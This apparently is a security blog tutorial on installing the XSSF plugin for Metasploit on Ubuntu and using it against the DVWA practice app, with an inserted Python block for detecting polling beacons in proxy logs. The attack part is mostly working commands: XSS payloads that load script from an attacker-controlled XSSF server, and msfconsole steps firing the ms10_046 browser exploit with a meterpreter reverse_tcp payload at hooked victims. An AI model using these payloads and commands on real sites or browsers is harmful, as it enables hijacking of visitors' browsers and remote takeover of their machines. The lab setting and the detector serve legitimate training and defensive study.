Security Street Knowledge
  • Add XSSF to Metasploit Framework on Ubuntu
  • What is XSSF or the Cross-site Scripting Framework?

    The XSS Framework (XSSF) manages the victims of a generic XSS attack and keeps a connection to each of them alive with a refreshing JavaScript loop, so that further browser-based attacks can be launched later.  After injection of the generic attack (the “loop” resource generated by XSSF), each victim asks the attack server every “x” seconds whether new commands are available.

    The advantage of building the project into the Metasploit Framework is the ability to run the browser exploits already included in MSF. Unlike the existing projects (BeEF, XeeK, XSSShell/XSSTunnel), XSSF makes it simple to add and run attacks (using MSF modules) and to execute existing MSF exploits without installing third-party solutions.  MSF uses Ruby scripts to create server listeners that wait for exploited browsers to connect.  In addition, the ability to create XSS tunnels with targeted victims is a real advantage.
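The fixed-interval polling described above is also what a defender can look for in proxy logs. The following is an added example, not part of the original post and not XSSF or Metasploit code: it flags clients that request one destination at a near-constant interval. The log layout, the thresholds, the placeholder poll path and all sample lines are assumptions constructed for illustration.

```python
"""Flag clients that request one destination at a near-constant interval.
Added example, not XSSF or Metasploit code. The proxy-log layout
"<epoch-seconds> <client-ip> <method> <url>" is an assumed format."""
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

def sample_log():
    """Constructed proxy log (not captured traffic)."""
    poller = "10.0.0.5 GET http://203.0.113.9:8888"
    lines = [f"1000.00 {poller}/loop?interval=2"]
    # Follow-up polls about every 2 s; the path is a placeholder.
    for i, jitter in enumerate([0.0, 0.1, -0.1, 0.05, 0.0, -0.05, 0.1], 1):
        lines.append(f"{1000 + 2 * i + jitter:.2f} {poller}/placeholder-poll")
    # A person browsing: irregular gaps to a single site.
    for ts in (1000, 1003, 1030, 1031, 1090, 1200, 1204):
        lines.append(f"{ts}.00 10.0.0.7 GET http://intranet.example/page")
    lines.append("truncated line")  # malformed input must be skipped
    return "\n".join(lines)

def parse(log):
    """Yield (timestamp, client, host:port) for each well-formed line."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        try:
            record = float(parts[0]), parts[1], urlsplit(parts[3]).netloc
        except ValueError:
            continue
        yield record

def find_pollers(log, min_requests=6, max_jitter=0.25, max_interval=60.0):
    """Return {(client, destination): mean gap in seconds} for regular polling."""
    seen = defaultdict(list)
    for stamp, client, dest in parse(log):
        seen[(client, dest)].append(stamp)
    hits = {}
    for key, stamps in seen.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        # Low coefficient of variation means machine-like regularity.
        if 0 < avg <= max_interval and pstdev(gaps) / avg <= max_jitter:
            hits[key] = round(avg, 2)
    return hits
```

The detector deliberately ignores the request path, so it does not depend on how the polling requests are named; legitimate pollers (webmail, chat widgets) will also match and need allow-listing by destination.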

    [Video: how XSSF works in Metasploit]

    [Video: how XSSF Tunnel works]


    Setting up XSSF Framework for Metasploit on Ubuntu 10.10

     

    Download http://www.metasploit.com/redmine/attachments/596/XSSF.zip

     

    UNZIP and copy files into metasploit /msf3 directory

    cp -iR /home/user/Downloads/XSSF/data/ /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/lib/ /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/modules/ /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/plugins/ /opt/metasploit3/msf3/

     

    RENAME XSSF.rb ruby script (its name is wrong in the zip file)

    mv /opt/metasploit3/msf3/plugins/XSSF.rb /opt/metasploit3/msf3/plugins/xssf.rb

     

    INSTALL MySQL IF NOT ALREADY INSTALLED

    Install MySQL with Synaptic or apt-get

    $ sudo apt-get install mysql-server mysql-client
    $ sudo apt-get install libmysql-ruby libmysqlclient-dev

     

    FIX MySQL ERROR: The database backend has not been initialized …

    gem install mysql

    (needed for XSSF to use MySQL driver)

     

     

    FIX RUBY ERRORS DURING START OF METASPLOIT (UPGRADE RUBY TO 1.9.1)

    apt-get install ruby1.9.1-full
    cd /usr/bin
    mv /usr/bin/ruby ruby1.8_symlink
    cp -s ruby1.9.1 ruby
    (-s creates a symbolic link to ruby version 1.9.1; the relative link only works from inside /usr/bin)

    SET GEM VERSION TO 1.9.1
    mv gem gem1.8_symlink
    cp -s gem1.9.1 gem
    (-s creates a symbolic link to gem version 1.9.1)

    NOW YOU NEED A SITE WITH AN XSS VULNERABILITY TO EXPLOIT:

    Damn Vulnerable Web App LIVE CD

     

    EXPLOIT: On DVWA as a Reflective or Stored Cross-site Scripting attack

    http://server_ipaddress/?lang="><script src="http://xssf_ipaddress:8888/loop?interval=2"></script>

    OR THIS INTO SUBMIT FIELD ON PAGE
    "><script src="http://xssf_ipaddress:8888/loop?interval=2"></script>

    You will see the victim page refresh every 2 secs.

     

    START METASPLOIT

    $ /opt/metasploit3/msf3/msfconsole

    msf> svn update (to get latest exploits, plugins, modules)

     

    CONNECT METASPLOIT TO MYSQL DATABASE

    msf> db_driver mysql
    msf> db_connect user:pass@127.0.0.1:3306/msf3

    (use the same password as when you set up the MySQL database above)

     

    USING METASPLOIT (XSSF):

    LOAD METASPLOIT XSSF AND TYPE
    msf> load XSSF (case-sensitive)

     

    Please run ‘http://ipaddress:8888/loop’ into any browser with JavaScript enabled

    msf> xssf_victims (note victim 1)
    msf> xssf_information 1
    msf> use auxiliary/xssf/alert
    msf> set AlertMessage XSS pop-up will appear
    msf> run

    USING METASPLOIT XSSF AUXILIARY MODULES:

    EXPLOIT BROWSER VIA XSSF WITH VULNERABILITY OF CHOICE

    msf> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    msf> set PAYLOAD windows/meterpreter/reverse_tcp
    msf> set LHOST 192.168.1.82
    msf> exploit
    msf> jobs
    msf> xssf_exploit 1 0
